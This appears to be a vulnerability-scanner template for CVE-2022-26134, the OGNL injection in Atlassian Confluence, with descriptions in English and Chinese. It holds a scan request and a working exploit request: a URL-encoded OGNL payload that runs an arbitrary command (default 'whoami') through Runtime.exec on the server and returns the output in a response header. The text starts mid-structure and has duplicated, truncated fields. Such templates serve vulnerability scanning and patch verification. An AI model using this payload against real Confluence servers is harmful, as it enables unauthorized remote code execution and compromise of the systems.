Atlassian confluence server is a server version of atlassian company that has enterprise knowledge management functions and supports collaborative software for building enterprise wikis.
Atlassian confluence has an ognl injection vulnerability that allows authenticated users (in some cases unauthenticated users) to execute arbitrary code on the confluence server.
Atlassian confluence has an ognl injection vulnerability that allows authenticated users (in some cases unauthenticated users) to execute arbitrary code on the confluence server.
At present, the official is making relevant security patch updates. It is recommended to pay attention to the official information and update it in a timely manner.
Website: https://www.atlassian.com/zh/software/confluence
", "References": [ "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/" ], "Is0day": false, "HasExp": true, "ExpParams": [ { "name": "cmd", "type": "input", "value": "whoami", "show": "" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22echo%20TTTest%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Test-Response%22%2C%23a%29%29%7D/", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "302", "bz": "" }, { "type": "item", "variable": "$head", "operation": "contains", "value": "X-Test-Response: TTTest", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{{{cmd}}}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "302", "bz": "" }, { "type": "item", "variable": "$head", "operation": "contains", "value": "X-Cmd-Response", "bz": "" } ] }, "SetVariable": [ "output|lastheader|regex|X-Cmd-Response: (.*?)\\n" ] } ], "Tags": [ "Code Execution" ], "VulType": [ "Code Execution" ], "CVEIDs": [ "CVE-2022-26134" ], "CNNVD": [ "" ], "CNVD": [ "" ], "CVSSScore": "9.8", "Translation": { "CN": { "Name": "Atlassian Confluence Webwork OGNL 注入漏洞 (CVE-2022-26134)", "Product": "atlassian-confluence", "Description": "Atlassian Confluence Server是Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。
Atlassian Confluence存在一个 OGNL 注入漏洞,允许经过身份验证的用户(在某些情况下未经身份验证的用户)在 Confluence 服务器执行任意代码。
目前官方正在制作相关安全补丁更新,建议关注官方消息,及时更新。
官方网址:https://www.atlassian.com/zh/software/confluence
", "Impact": "Atlassian Confluence存在一个 OGNL 注入漏洞,允许经过身份验证的用户(在某些情况下未经身份验证的用户)在 Confluence 服务器执行任意代码。攻击者可以使用攻击代码在服务器上执行任意命令。
Atlassian confluence server is a server version of atlassian company that has enterprise knowledge management functions and supports collaborative software for building enterprise wikis.
Atlassian confluence has an ognl injection vulnerability that allows authenticated users (in some cases unauthenticated users) to execute arbitrary code on the confluence server.
At present, the official is making relevant security patch updates. It is recommended to pay attention to the official information and update it in a timely manner.
Website: https://www.atlassian.com/zh/software/confluence
", "Impact": "Atlassian confluence has an ognl injection vulnerability that allows authenticated users (in some cases unauthenticated users) to execute arbitrary code on the confluence server.